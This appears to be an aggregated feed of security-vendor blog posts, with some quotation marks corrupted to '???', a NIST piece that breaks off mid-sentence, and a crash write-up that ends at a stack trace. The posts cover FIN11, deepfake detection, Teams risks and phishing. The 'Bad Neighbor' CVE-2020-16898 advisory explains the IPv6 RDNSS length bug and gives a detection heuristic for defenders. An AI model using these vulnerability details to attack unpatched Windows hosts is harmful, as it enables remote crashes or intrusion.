???There is no greater endorsement than the voice and passion of our customers,??? said Sam King, CEO of Veracode. ???This Customers??? Choice distinction by Gartner Peer Insights reflects the impact of our best-in-class solutions and customer service. Veracode is committed to helping our customers navigate the ever-evolving application security landscape, with an impassioned focus on empowering developers to both find and fix code defects early in the development process. Thank you to all the Veracode customers worldwide that have made us their trusted partner in secure software delivery.???

What are our customers saying in their reviews on Gartner Peer Insights? Many tout Veracode???s SaaS-based solution as a key benefit. ???They operate a ???service-based solution??? removing many of the obstacles typical of on-premises scan solutions,??? stated a May 22, 2020 review by the director of security and risk at a manufacturing company. Our customers also talk about how Veracode empowers developers to find and fix code defects early in the development process. A director of application development for the government sector remarked in a review on July 24, 2020 ???[Veracode] was incredibly easy to implement and we had a high rate of developer adoption. We saw phenomenal results in reducing our security risk within the first six months. We are now several years into product implementation and have grown our adoption with both product and automation.???

To learn more about Gartner Peer Insights 2020 Customers??? Choice for AST and what our customers have to say about our leading application security testing solutions, download the Peer Insights Voice of the Customer report.

Disclaimer: Gartner Peer Insights Customers??? Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

Gartner Peer Insights ???Voice of the Customer???: Application Security Testing, Peer Contributors, 9ツ? October 2020

Introducing Veracode’s New Partner Training and Certification Paths

We are excited to announce the launch of our new partner training and certification paths, open to all authorized Veracode partners.

Based on partner feedback, we have designed these paths to provide a deeper understanding of the Veracode story and technical details around application security (AppSec). By enlisting in our training and certification paths, we enable partners to expand their business and support customers in developing a comprehensive AppSec program.

Some of the benefits of this new program:

  • Free-of-charge, best-in-class trainings and certifications focused on AppSec.
  • On-demand, self-paced paths that enable partners to learn what they want, when they want.
  • Added visibility for individuals earning their certification with designated badges, showcasing the partner???s AppSec expertise.
  • Greater access to leads and joint opportunities for partners with certified individuals.

These new training and certification paths give partners a choice of three levels of learning. Through on-demand, self-paced courses they can advance to the level of training that best suits their role ??? ultimately growing their business through application security offerings.

Training levels

With this deeper level of knowledge, partners can expand their customer base, and sales and technical teams can support their prospects and customers more effectively in building and managing their AppSec program.

As always, we remain committed to our partners who do the important work of caring for customers ??? whether across the globe or in local and regional markets. We hope these new training and certification paths inspire further collaboration, increased business growth, and an even better experience for customers and prospects. ツ?

For more information on our partner training and certification, please contact your Veracode regional channel manager or send an email to partners@veracode.com.

FIN11: Widespread Email Campaigns as Precursor for Ransomware and Data Theft

Mandiant Threat Intelligence recently promoted a threat cluster to a named FIN (or financially motivated) threat group for the first time since 2017. We have detailed FIN11's various tactics, techniques and procedures in a report that is available now by signing up for Mandiant Advantage Free.

In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. There are significant gaps in FIN11’s phishing operations, but when active, the group conducts up to five high-volume campaigns a week. While many financially motivated threat groups are short lived, FIN11 has been conducting these widespread phishing campaigns since at least 2016. From 2017 through 2018, the threat group primarily targeted organizations in the financial, retail, and hospitality sectors. However, in 2019 FIN11’s targeting expanded to include a diverse set of sectors and geographic regions. At this point, it would be difficult to name a client that FIN11 hasn’t targeted.

Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.

Notably, FIN11 includes a subset of the activity security researchers call TA505, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

To learn more about FIN11’s evolving delivery tactics, use of services, post-compromise TTPs, and monetization methods, register for Mandiant Advantage Free. The full FIN11 report is also available through our FireEye Intelligence Portal (FIP). Then for even more information, register for our exclusive webinar on Oct. 29 where Mandiant threat intelligence experts will take a deeper dive into FIN11, including its origins, tactics, and potential for future activity. 

The Deepfakes Lab: Detecting & Defending Against Deepfakes with Advanced AI

Detrimental lies are not new. Even misleading headlines and text can fool a reader.  However, the ability to alter reality has taken a leap forward with “deepfake” technology which allows for the creation of images and videos of real people saying and doing things they never said or did. Deep learning techniques are escalating the technology’s finesse, producing even more realistic content that is increasingly difficult to detect.

Deepfakes began to gain attention when a fake pornography video featuring a “Wonder Woman” actress was released on Reddit in late 2017 by a user with the pseudonym “deepfakes.” Several doctored videos have since been released featuring high-profile celebrities, some of which were purely for entertainment value and others which have portrayed public figures in a demeaning light. This presents a real threat. The internet already distorts the truth as information on social media is presented and consumed through the filter of our own cognitive biases.

Deepfakes will intensify this problem significantly. Celebrities, politicians and even commercial brands can face unique forms of threat tactics, intimidation, and personal image sabotage. The risks to our democracy, justice, politics and national security are serious as well. Imagine a dark web economy where deepfakers produce misleading content that can be released to the world to influence which car we buy, which supermarket we frequent, and even which political candidate receives our vote. Deepfakes can touch all areas of our lives; hence, basic protection is essential.

How are Deepfakes Created?

Deepfakes are a cutting-edge advancement of Artificial Intelligence (AI) often leveraged by bad actors who use the technology to generate increasingly realistic and convincing fake images, videos, voice, and text. These videos are created by the superimposition of existing images, audio, and videos onto source media files by leveraging an advanced deep learning technique called “Generative Adversarial Networks” (GANs). GANs are relatively recent concepts in AI which aim to synthesize artificial images that are indistinguishable from authentic ones. The GAN approach brings two neural networks to work simultaneously: one network called the “generator” draws on a dataset to produce a sample that mimics it. The other network, known as the “discriminator”, assesses the degree to which the generator succeeded. Iteratively, the assessments of the discriminator inform the assessments of the generator. The increasing sophistication of GAN approaches has led to the production of ever more convincing and nearly impossible to expose deepfakes, and the result far exceeds the speed, scale, and nuance of what human reviewers could achieve.

McAfee Deepfakes Lab Applies Data Science Expertise to Detect Bogus Videos

To mitigate this threat, McAfee today announced the launch of the McAfee Deepfakes Lab to focus the company’s world-class data science expertise and tools on countering the  deepfake menace to individuals, organizations, democracy and the overall integrity of information across our society. The Deepfakes Lab combines computer vision and deep learning techniques to exploit hidden patterns and detect manipulated video elements that play a key role in authenticating original media files.  

To ensure the prediction results of the deep learning framework and the origin of solutions for each prediction are understandable, we spent a significant amount of time visualizing the layers and filters of our networks then added a model-agnostic explainability framework on top of the detection framework. Having explanations for each prediction helps us make an informed decision about how much we trust the image and the model as well as provide insights that can be used to improve the latter.

We also performed detailed validation and verification of the detection framework on a large dataset and tested detection capability on deepfake content found in the wild. Our detection framework was able to detect a recent deepfake video of Facebook’s Mark Zuckerberg giving a brief speech about the power of big data. The tool not only provided an accurate detection score but generated heatmaps via the model-agnostic explainability module highlighting the parts of his face contributing to the decision, thereby adding trust in our predictions.

Such easily available deepfakes reiterate the challenges that social networks face when it comes to policing manipulated content. As advancements in GAN techniques produce very realistic looking fake images, advanced computer vision techniques will need to be developed to identify and detect advanced forms of deepfakes. Additionally, steps need to be taken to defend against deepfakes by making use of watermarks or authentication trails.

Sounding the Alarm

We realize that news media do have considerable power in shaping people’s beliefs and opinions. As a consequence, their truthfulness is often compromised to maximize impact. The dictum “a picture is worth a thousand words” accentuates the significance of the deepfake phenomenon. Credible yet fraudulent audio, video, and text will have a much larger impact that can be used to ruin celebrity and brand reputations as well as influence political opinion with terrifying implications. Computer vision and deep learning detection frameworks can authenticate and detect fake visual media and text content, but the damage to reputations and influencing opinion remains.

In launching the Deepfakes Lab, McAfee will work with traditional news and social media organizations to identify malicious deepfakes videos during this crucial 2020 national election season and help combat this new wave of disinformation associated with deepfakes.

In our next blog on deepfakes, we will demonstrate our detailed detection framework. With this framework, we will be helping to battle disinformation and minimize the growing challenge of deepfakes.

To engage the services of the McAfee Deepfakes Lab, news and social media organizations may submit suspect video for analysis by sending content links to media@mcafee.com.

 

The post The Deepfakes Lab: Detecting & Defending Against Deepfakes with Advanced AI appeared first on McAfee Blogs.

Election 2020 – How to Spot Phony Deepfake Videos this Election

Election 2020 – How to Spot Phony Deepfake Videos this Election

Maybe you’ve seen videos where Robert Downey Jr. and other cast members of The Avengers follow the yellow brick road after they swap faces with the cast of 1939’s The Wizard of Oz. Or how about any of the umpteen videos where the face of actor Nicolas Cage is swapped with, well, everybody, from the cast of Friends to Forrest Gump. They’re funny, uncanny, and sometimes a little too real. Welcome to deepfakes, a technology that can be entertaining, yet one that has election year implications—now and for years to come.

What are deepfakes?

Deepfakes are phoney video or audio recordings that look and sound real, so much so that the best of them can dupe people into thinking they’re the real thing. They’re not unlike those face-swapping apps your children or nieces and nephews may have on their phones, albeit more sophisticated. Less powerful versions of deepfaking software are used by the YouTube channels that create the videos I mentioned above. However, more sophisticated deepfake technologies have chilling repercussions when it comes to public figures, such as politicians.

Imagine creating a video of a public figure where you literally put words into their mouth. That’s what deepfakes effectively do. This can lead to threat tactics, intimidation, and personal image sabotage—and in an election year, the spread of disinformation.

Deepfakes sow the seeds of doubt

Deepfakes can make you question if what you’re seeing, and hearing, is actually real. In terms of an election year, they can introduce yet another layer of doubt into our discourse—leading people to believe that a political figure has said something that they’ve never said. And, conversely, giving political figures an “out” where they might decry a genuine audio or video clip as a deepfake, when in fact it is not.

The technology and security industries have responded by rolling out their own efforts to detect and uncover deepfakes. Here at McAfee, we’ve launched McAfee Deepfakes Lab, which provides traditional news and social media organizations advanced Artificial Intelligence (AI) analysis of suspected deepfake videos intended to spread reputation-damaging lies about individuals and organizations during the 2020 U.S. election season and beyond.

However, what can you do when you encounter, or think you encounter, a deepfake on the internet? Just like in my recent blog on election misinformation, a few tips on media savvy point the way.

How to spot deepfakes

While the technology continually improves, there are still typical telltale signs that a video you’re watching is a deepfake. Creators of deepfakes count on you to overlook some fine details, as the technology today largely has difficulty capturing the subtle touches of their subjects. Take a look at:

  • Their face. Head movement can cause a slight glitch in the rendering of the image, particularly because the technology works best when the subject is facing toward the camera.
  • Their skin. Blotchy patches, irregular skin tones, or flickering at the edges of the face are all signs of deepfake videos.
  • Their eyes. Other glitches may come by way of eyeglasses, eyes that look expressionless, and eyes that appear to be looking in the wrong direction. Likewise, the light reflected in their irises may look strangely lit in a way that does not match the setting.
  • Their hair. Flyaway hairs and some of the irregularities you’ll find in a person’s smile continue to be problematic for deepfakes. Instead, that head of hair could look a little too perfect.
  • Their smile. Teeth don’t always render well in deepfakes, sometimes looking more like white bars instead of showing the usual irregularities we see in people’s smiles. Also, look out for inconsistencies in the lip-syncing.

 Listen closely to what they’re saying, and how they’re saying it

This is important. Like I pointed out in my recent article on how to spot fake news and misinformation in your social media feed, deepfake content is meant to stir your emotions—whether that’s a sense of ridicule, derision, outrage, or flat-out anger. While an emotional response to some video you see isn’t a hard and fast indicator of a deepfake itself, it should give you a moment of pause. Listen to what’s being said. Consider its credibility. Question the motives of the producer or poster of the video. Look to additional credible sources to verify that the video is indeed real.

How the person speaks is important to consider as well. Another component of deepfake technology is audio deepfaking. As recently as 2019, fraudsters used audio deepfake technology to swindle nearly $250,000 dollars from a UK-based energy firm by mimicking the voice of its CEO over the phone. Like its video counterpart, audio deepfakes can sound uncannily real, or at least real enough to sow a seed of doubt. Characteristically, the technology has its shortcomings. Audio deepfakes can sound “off,” meaning that it can sound cold, like the normal and human emotional cues have been stripped away—or that the cadence is off, making it sound flat the way a robocall does.

As with all things this election season and beyond, watch carefully, listen critically. And always look for independent confirmation. For more information on our .GOV-HTTPS county website research, potential disinformation campaigns, other threats to our elections, and voter safety tips, please visit our Elections 2020 page: https://www.mcafee.com/enterprise/en-us/2020-elections.html

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Election 2020 – How to Spot Phony Deepfake Videos this Election appeared first on McAfee Blogs.

CVE-2020-16898: “Bad Neighbor”

CVE-2020-16898: “Bad Neighbor”

CVSS Score: 8.8

Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

Overview
Today, Microsoft announced a critical vulnerability in the Windows IPv6 stack, which allows an attacker to send maliciously crafted packets to potentially execute arbitrary code on a remote system. The proof-of-concept shared with MAPP (Microsoft Active Protection Program) members is both extremely simple and perfectly reliable. It results in an immediate BSOD (Blue Screen of Death), but more so, indicates the likelihood of exploitation for those who can manage to bypass Windows 10 and Windows Server 2019 mitigations. The effects of an exploit that would grant remote code execution would be widespread and highly impactful, as this type of bug could be made wormable. For ease of reference, we nicknamed the vulnerability “Bad Neighbor” because it is located within an ICMPv6 Neighbor Discovery “Protocol”, using the Router Advertisement type.

Vulnerability Details
A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets that use Option Type 25 (Recursive DNS Server Option) and a length field value that is even. In this Option, the length is counted in increments of 8 bytes, so an RDNSS option with a length of 3 should have a total length of 24 bytes. The option itself consists of five fields: Type, Length, Reserved, Lifetime, and Addresses of IPv6 Recursive DNS Servers. The first four fields always total 8 bytes, but the last field can contain a variable number of IPv6 addresses, which are 16 bytes each. As a result, the length field should always be an odd value of at least 3, per RFC 8106:

When an IPv6 host receives DNS options (i.e., RDNSS and DNSSL
options) through RA messages, it processes the options as follows:

   o  The validity of DNS options is checked with the Length field;
      that is, the value of the Length field in the RDNSS option is
      greater than or equal to the minimum value (3) and satisfies the
      requirement that (Length - 1) % 2 == 0.

When an even length value is provided, the Windows TCP/IP stack incorrectly advances the network buffer by an amount that is 8 bytes too few. This is because the stack internally counts in 16-byte increments, failing to account for the case where a non-RFC compliant length value is used. This mismatch results in the stack interpreting the last 8 bytes of the current option as the start of a second option, ultimately leading to a buffer overflow and potential RCE.

It is likely that a memory leak or information disclosure bug in the Windows kernel would be required in order to build a full exploit chain for this vulnerability. Despite this, we expect to see working exploits in the very near future.

Threat Surface
The largest impact here will be to consumers on Windows 10 machines, though with Windows Updates the threat surface is likely to be quickly minimized. While Shodan.io shouldn’t be counted on as a definitive source, our best queries put the number of Windows Server 2019 machines with IPv6 addresses is in the hundreds, not exceeding approximately 1000. This is likely because most servers are behind firewalls or hosted by Cloud Service Providers (CSPs) and not reachable directly via Shodan scans.

Detection
We believe this vulnerability can be detected with a simple heuristic that parses all incoming ICMPv6 traffic, looking for packets with an ICMPv6 Type field of 134 – indicating Router Advertisement – and an ICMPv6 Option field of 25 – indicating Recursive DNS Server (RDNSS). If this RDNSS option also has a length field value that is even, the heuristic would drop or flag the associated packet, as it is likely part of a “Bad Neighbor” exploit attempt.

Mitigation
Patching is always the first and most effective course of action. If this is not possible, the best mitigation is disabling IPv6, either on the NIC or at the perimeter of the network by dropping ICMPv6 traffic if it is non-essential. Additionally, ICMPv6 Router Advertisements can be blocked or dropped at the network perimeter. Windows Defender and Windows Firewall fail to block the proof-of-concept when enabled. It is unknown yet if this attack can succeed by tunneling the ICMPv6 traffic over IPv4 using technologies like 6to4 or Teredo. Our efforts to repeat the attack in this manner have not been successful to date.

For those McAfee customers who are unable to deploy the Windows patch, the following Network Security Platform (NSP) signatures will provide a virtual patch against attempted exploitation of this vulnerability, as well as a similar vulnerability (CVE-2020-16899). Unlike “Bad Neighbor”, the impact of CVE-2020-16899 is limited to denial-of-service in the form of BSoD.

NSP Attack ID: 0x40103a00 – ICMP: Windows IPv6 Stack Elevation of Privilege Vulnerability (CVE-2020-16898)
NSP Attack ID: 0x40103b00 – ICMP: Windows Function Discovery SSDP Provider Elevation of Privilege Vulnerability (CVE-2020-16899)

Additionally, we are releasing Suricata rules to detect potential exploitation of these vulnerabilities. Due to limitations in open source tools such as Snort and Suricata, we found that implementing the minimal detection logic described earlier required combining Suricata with its built-in Lua script parser. We have hosted the rules and Lua scripts at our public GitHub under CVE-2020-16898 and CVE-2020-16899 respectively. Although we have confirmed that the rules correctly detect use of the proof-of-concepts, they should be thoroughly vetted in your environment prior to deployment to avoid risk of any false positives.

The post CVE-2020-16898: “Bad Neighbor” appeared first on McAfee Blogs.

“Best of Breed” – CASB/DLP and Rights Management Come Together

Securing documents before cloud

Before the cloud, organizations would collaborate and store documents on desktop/laptop computers, email and file servers. Private cloud use-cases such accessing and storing documents on intranet web servers and network attached storage (NAS) improved the end-user’s experience. The security model followed a layered approach, where keeping this data safe was just as important as not allowing unauthorized individuals into the building or data center. This was followed by a directory service to sign into to protect your personal computer, then permissions on files stored on file servers to assure safe usage.

Enter the cloud

Most organizations now consider cloud services to be essential in their business. Services like Microsoft 365 (Sharepoint, Onedrive, Teams), Box, and Slack are depended upon by all users. The same fundamental security concepts exist – however many are covered by the cloud service themselves. This is known as the “Shared Security Model” – essentially the Cloud Service Provider handles basic security functions (physical security, network security, operations security), but ultimately the end customer must correctly give access to data and is ultimately responsible for properly protecting it.

The big difference between the two is that in the first security model, the organization owned and controlled the entire process. In the second cloud model, the customer owns the controls surrounding the data they choose to put in the cloud. This is the risk that collaborating and storing data in the cloud brings; once the documents have been stored in M365, what happens if it is mishandled from this point forward? Who is handling these documents? What if my most sensitive information has left the safe confines of the cloud service, how can I protect that once it leaves? Fundamentally: How can I control data that lives hypothetically anywhere, including areas that I do not have control over?

Adding the protection layers that are cloud-native

McAfee and Seclore have extended an integration recently to address these cloud-based use cases. This integration fundamentally answers this question: If I put sensitive data in the cloud that I do not control, can I still protect the data regardless of where it lives?

The solution works like this:

The solution puts guardrails around end-user cloud usage, but also adds significant compliance protections, security operations, and data visibility for the organization.

Data visibility, compliance & security operations

Once an unprotected sensitive file has been uploaded to a cloud service, McAfee MVISION Cloud Data Loss Prevention (DLP) detects the file upload. Customers can assign a DLP policy to find sensitive data such as credit card data (PCI), customer data, personally identifiable information (PII) or any other data they find to be sensitive.

Sample MVISION Cloud DLP Policy

If data is found to be in violation of policy, it means the data must be properly protected. For example, if the DLP engine finds PII, rather than let it sit unprotected in the cloud service, the McAfee policy the customer sets should enact some protection on file. This action is known as an “Response”, and MVISION Cloud will properly show the detection, violating data, and actions taken in the incident data. In this case, McAfee will call Seclore to protect the file. These actions can be performed both in near real-time, or will enact protection whenever data already exists in the cloud service (on demand scan).

“Seclore-It” – Protection Beyond Encryption

Now that the file has been protected, downstream access to the file is managed by Seclore’s policy engine. Examples of policy-based access could be end-user location, data type, user group, time of day, or any other combination of policy choices. The key principle here is the file is protected regardless of where it goes and enforced by a Seclore policy that the organization sets. If a user accesses the file, an audit trail is recorded to assure that organizations have the confidence that data is properly protected. The audit logs show allows and denies, completing the data visibility requirements.

Addressing one last concern; if a file is “lost” or the need to restrict access to files that are no longer in direct control such as when a user leaves the company, or if the organization simply wants to update policies on protected files, the policy on those files can be dynamically updated. This addresses a major data loss concern that companies have for cloud service providers and general data use for remote users. Ensuring files are always protected, regardless of scenario is simple to achieve with Seclore by taking the action to update a policy. Once the policy has been updated, even files on a thumb drive stuffed in a drawer are now re-protected from accidental or intentional disclosure.

Conclusion

This article addresses several notable concerns for customers doing business in a cloud model. Important/sensitive data can now be effortlessly protected as it migrates to and through cloud services to its ultimate destination. The organization can prove compliance to auditors that the data was protected and continues to be protected. Security operations can track incidents and follow the access history of files. Finally, the joint solution is easy to use and enables businesses to confidently conduct business in the cloud.

Next Steps

McAfee and Seclore partner both at the endpoint and in the cloud as an integrated solution. To find out more and see this solution running in your environment, send an inquiry to cloud@mcafee.com

 

The post “Best of Breed” – CASB/DLP and Rights Management Come Together appeared first on McAfee Blogs.

Top 10 Microsoft Teams Security Threats

2020 has seen cloud adoption accelerate with Microsoft Teams as one of the fastest growing collaboration apps, McAfee customers use of Teams increased by 300% between January and April 2020. When we looked into Teams use in more detail in June, we found these statistics, on average, in our customer base:

 

Teams Created                                                                 367

Members added to Teams                                      6,526

Number of Teams Meetings                              106,000

3rd Party Apps added to Teams                                 185

Guest users added to Teams                                  2,906

This means that a typical enterprise has a new guest user added to their teams every few minutes – you wouldn’t allow unknown people to walk into an office, straight past security and walk around the building unescorted looking at papers sitting on people’s desks, but at the same time you want to allow in those guests you trust. For Teams, you need the same controls – allow in those guests you trust, but confirm their identity and make sure that they don’t see confidential information.

Microsoft invests huge amounts of time and money in the security of their systems, but security of the data in those systems and how they are used by the users is the responsibility of the enterprise.

The breadth of options, including inviting guest users and integration with 3rd party applications can be the Achilles heel of any collaboration technology. It takes just seconds to add an external third party into an internal discussion without realizing the potential for data loss, so sadly the risk of misconfiguration, oversharing or misuse can be large.

IT security teams need the ability to manage and control use to reduce risk of data loss or malware entering through Teams.

After working with hundreds of enterprises and over 40 million MVISION Cloud users worldwide and discussing with IT security, governance and risk teams how they address their Microsoft Teams security concerns, we have published a paper that outlines the top ten security threats and how to address them.

Microsoft Teams: Top 10 Security Threats

This collaboration potentially increases threats such as data loss and malware distribution. In this paper, McAfee discusses the top threats resulting from Teams use along with recommended actions.
Download Now

A few of the 10 Top Microsoft Teams Security Threats are below, read the paper for the full list.

  1. Microsoft Teams Guest Users: Guests can be added to see internal/sensitive content. By setting allow and/or block list domains, security can be implemented with the flexibility to allow employees to collaborate with authorized guests via Teams.
  2. Screen sharing that includes sensitive data. Screen sharing is very powerful, but can inadvertently share confidential data, especially if communication applications such as email are showing alerts on the screen.
  3. Access from Unmanaged Devices: Teams can be used on unmanaged devices, potentially resulting in data loss. The ability to set policies for unmanaged devices can safeguard Teams content.
  4. Malware Uploaded via Teams: File uploads from guests or from unmanaged devices may contain malware. IT administrators need the ability to either block all file uploads from unmanaged devices or to scan content when it is uploaded and remove it from the channel, informing IT management of any incidents.
  5. Data Loss Via Teams Chat and File Shares: File shares in Teams can lose confidential data. Data loss prevention technologies with strong sensitive content identification and sharing control capabilities should be implemented on Teams chat and file shares.
  6. Data Loss Via Other Apps: Teams App integration can mean data may go to untrusted destinations. As some of these apps may transfer data via their services, IT administrators need a system to discover third-party apps in use, review their risk profile and provide a workflow to remediate, audit, allow, block or notify users on an app’s status and revoke access as needed.

McAfee has a wealth of experience helping customers security their cloud computing systems, built around the MVISION Cloud CASB and other technologies. We can advise you about Microsoft Teams security and discuss possible threats of taking no action. Contact us to let us help you.

Teams is just one of the many applications within the Microsoft 365 suite and it is important to deploy common security controls for all cloud apps. MVISION Cloud provides security for Microsoft 365 and other cloud-based applications such as Salesforce, Box, Workday, AWS, Azure, Google Cloud Platform and customers’ own internally developed applications.

 

The post Top 10 Microsoft Teams Security Threats appeared first on McAfee Blogs.

Ready, Set, Shop: Enjoy Amazon Prime Day Without the Phishing Scams

credit card breach

For many, Amazon Prime Day is an opportunity to score some great deals. For hackers, Amazon’s annual discount shopping campaign is an opportunity to target unsuspecting shoppers with phishing scams. In fact, researchers at McAfee Labs previously uncovered a phishing kit specifically created to steal personal information from Amazon customers in America and Japan just in time for last year’s Amazon Prime Day. 

Let’s dive into the details of how this phishing kit worked and what you can do to protect yourself while hunting for those Prime Day bargains.  

Phishing Kit Allowed Hackers to Target Amazon Users 

You’ve probably received an email that looked a bit phishyperhaps the logo was just slightly offcentered, or something about it didn’t feel quite right. That is how the phishing kit worked: hackers created fake emails that looked like they originated from Amazon (but didn’t). Once opened, the email prompted the unsuspecting recipient to provide their login credentials on a malicious website. Once logged in, hackers had access to the victim’s entire account, enabling them to make purchases or even worse, steal the victim’s credit card information.  

When this threat first emerged, the McAfee Labs researchers reported widespread use of the phishing kit – with over 200 malicious URLs deployed on innocent online shoppers. The phishing kit was then sold through an active Facebook group with over 300 members looking for a way to access unsuspecting shoppers’ Prime accountsMcAfee notified Facebook of this group’s activity when it surfaced, and the social network took an active role in removing groups and accounts that violate their policies.   

Protect Your Prime Day Shopping with These Tips 

Users hoping to score some online shopping deals this week should familiarize themselves with common phishing tactics to help protect their personal and financial information. If you’re planning on participating in Prime Day, follow these security steps to help you swerve malicious cyberattacks and shop with peace of mind: 

Beware of bogus deals 

If you see an ad for Prime Day that looks too good to be true, chances are that the ad isn’t legitimate. Play it safe and don’t click on the ad. 

Think before you click 

Be skeptical of ads shared on social media sites, emails, and messages sent to you through platforms like Facebook, Twitter, and WhatsApp. If you receive a suspicious message regarding Prime Day, it’s best to avoid interacting with the message altogether. 

Do your due diligence with discount codes 

If a discount code lands in your inbox, you’re best off verifying it through Amazon.com directly rather than clicking on any links. 

If you do suspect that your Amazon Prime account has been compromised due to a cyberthreat, take the following steps: 

Change your password 

Change the passwords to any accounts you suspect may have been impacted. Make sure your new credentials are strong and unique from your other logins. For tips on how to create a more secure password, read our blog on common password habits and how to safeguard your accounts.  

Keep an eye on your bank account 

One of the most effective ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately. 

Consider using identity theft protection 

A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity. 

Stay Updated 

To stay updated on all things  McAfee  and on top of the latest consumer and mobile security threats, follow  @McAfee_Home  on Twitter, listen to our podcast  Hackable?, and ‘Like’ us on  Facebook. 

The post Ready, Set, Shop: Enjoy Amazon Prime Day Without the Phishing Scams appeared first on McAfee Blogs.

FedRAMP – What’s the Big Deal?

If you are someone who works for a cloud service provider in the business of federal contracting, you probably already have a good understanding of FedRAMP. It is also likely that our regular blog readers know the ins and outs of this program.

For those who are not involved in these areas, however, this acronym may be more unfamiliar. Perhaps you have only heard of it in passing conversation with a few of your expert cybersecurity colleagues, or you are just curious to learn what all of the hype is about. If you fall into this category – read on! This blog is for you.

At first glance, FedRAMP may seem like a type of onramp to an interstate headed for the federal government – and in a way, it is.

FedRAMP stands for the Federal Risk and Authorization Management Program, which provides a standard security assessment, authorization and continuous monitoring for cloud products and services to be used by federal agencies. The program’s overall mission is to protect the data of U.S. citizens in the cloud and promote the adoption of secure cloud services across the government with a standardized approach.

Once a cloud service has successfully made it onto the interstate – or achieved FedRAMP authorization – it’s allowed to be used by an agency and listed in the FedRAMP Marketplace. The FedRAMP Marketplace is a one-stop-shop for agencies to find cloud services that have been tested and approved as safe to use, making it much easier to determine if an offering meets security requirements.

In the fourth year of the program, FedRAMP had 20 authorized cloud service offerings. Now, eight years into the program, FedRAMP has over 200 authorized offerings, reflecting its commitment to help the government shift to the cloud and leverage new technologies.

Who should be FedRAMP authorized?

Any cloud service provider that has a contract with a federal agency or wants to work with an agency in the future must have FedRAMP authorization. Compliance with FedRAMP can also benefit providers who don’t have plans to partner with government, as it signals to the private sector they are committed to cloud security.

Using a cloud service that complies with FedRAMP standards is mandatory for federal agencies. It has also become popular with organizations in the private industry, which are more often looking to FedRAMP standards as a security benchmark for the cloud services they use.

How can a cloud service obtain authorization?

There are two ways for a cloud service to obtain FedRAMP authorization. One is with a Joint Authorization Board (JAB) provisional authorization (P-ATO) and the other is through an individual agency Authority to Operate (ATO).

A P-ATO is an initial approval of the cloud service provider by the JAB, which is made up of the Chief Information Officers (CIOs) from the Department of Defense (DoD), Department of Homeland Security (DHS) and General Services Administration (GSA). This designation means that the JAB has provided a provisional approval for agencies to leverage when granting an ATO to a cloud system.

The head of an agency grants an ATO as part of the agency authorization process. An ATO may be granted after an agency sponsor reviews the cloud service offering and completes a security assessment.

Why seek FedRAMP approval?

Achieving FedRAMP authorization for a cloud service is a very long and rigorous process, but it has received high praise from security officials and industry experts alike for its standardized approach to evaluate whether a cloud service offering meets some of the strongest cybersecurity requirements.

There are several benefits for cloud providers who authorize their service with FedRAMP. The program allows an authorized cloud service to be reused continuously across the federal government – saving time, money and effort for both cloud service providers and agencies. Authorization of a cloud service also gives service providers increased visibility of their product across government with a listing in the FedRAMP Marketplace.

By electing to comply with FedRAMP, cloud providers can demonstrate dedication to the highest data security standards. Though the process for achieving FedRAMP approval is complex, it is worthwhile for providers, as it signals a commitment to security to government and non-government customers.

McAfee’s Commitment to FedRAMP

At McAfee, we are dedicated to ensuring our cloud services are compliant with FedRAMP standards. We are proud that McAfee’s MVISION Cloud is the first Cloud Access Security Broker (CASB) platform to be granted a FedRAMP High Impact Provisional Authority to Operate (P-ATO) from the U.S. Government’s Joint Authorization Board (JAB).

Currently, MVISION Cloud is in use by ten federal agencies, including the Department of Energy (DOE), Department of Health and Human Services (HHS), Department of Homeland Security (DHS), Food and Drug Administration (FDA) and National Aeronautics and Space Administration (NASA).

MVISION Cloud allows federal organizations to have total visibility and control of their infrastructure to protect their data and applications in the cloud. The FedRAMP High JAB P-ATO designation is the highest compliance level available under FedRAMP, meaning that MVISION Cloud is authorized to manage highly sensitive government data.

We look forward to continuing to work closely with the FedRAMP program and other cloud providers dedicated to authorizing cloud service offerings with FedRAMP.

 

The post FedRAMP – What’s the Big Deal? appeared first on McAfee Blogs.

Providing NIST Guest Researchers with the Tools they Need

NIST is made up of a wide array of professionals from many different backgrounds, from science and engineering to communications, information technology, and many more. Combining all of these fields onto one campus and cross-department cooperation builds this institute into a leader of standards and technology. Outside of the federal government employees here, there is another group of individuals that bring just as much to the table as anyone else, and they are the guest researchers. Guest researchers at NIST can be broken down into two groups: domestic associates and foreign associates. A

Crash Reproduction Series: IE Developer Console UAF

Crash Reproduction Series: IE Developer Console UAF

During a DFIR investigation, using ZecOps Crash Forensics on a developer’s computer we encountered a consistent crash on Internet Explorer 11. The TL;DR is that albeit this bug is not exploitable, it presents an interesting expansion to the attack surface through the Developer Consoles on browsers.

While examining the stack trace, we noticed a JavaScript engine failure. The type of the exception was a null pointer dereference, which is typically not alarming. We investigated further to understand whether this event can be exploited.

We examined the stack trace below: 

58c0cdba     mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb
584d6ebc     mshtml!CDomEventRegistrationCallback2<CDiagnosticsElementEventHelper>::OnDOMEventListenerRemoved2+0x1a
